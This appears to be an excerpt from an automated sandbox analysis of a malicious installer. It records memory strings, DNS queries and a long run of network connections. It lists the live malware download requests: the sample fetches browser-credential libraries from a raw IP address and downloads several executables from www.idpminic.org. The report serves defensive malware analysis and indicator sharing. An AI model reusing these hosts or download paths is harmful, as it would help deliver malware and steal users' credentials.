Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: www.idpminic.org

Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: 109.107.173.210Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.exe HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: www.idpminic.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.exe HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: www.idpminic.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aula/hiuhehufw.exe HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: www.idpminic.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.exe HTTP/1.1Content-Type: text/plain;User-Agent: 23591Host: www.idpminic.orgConnection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
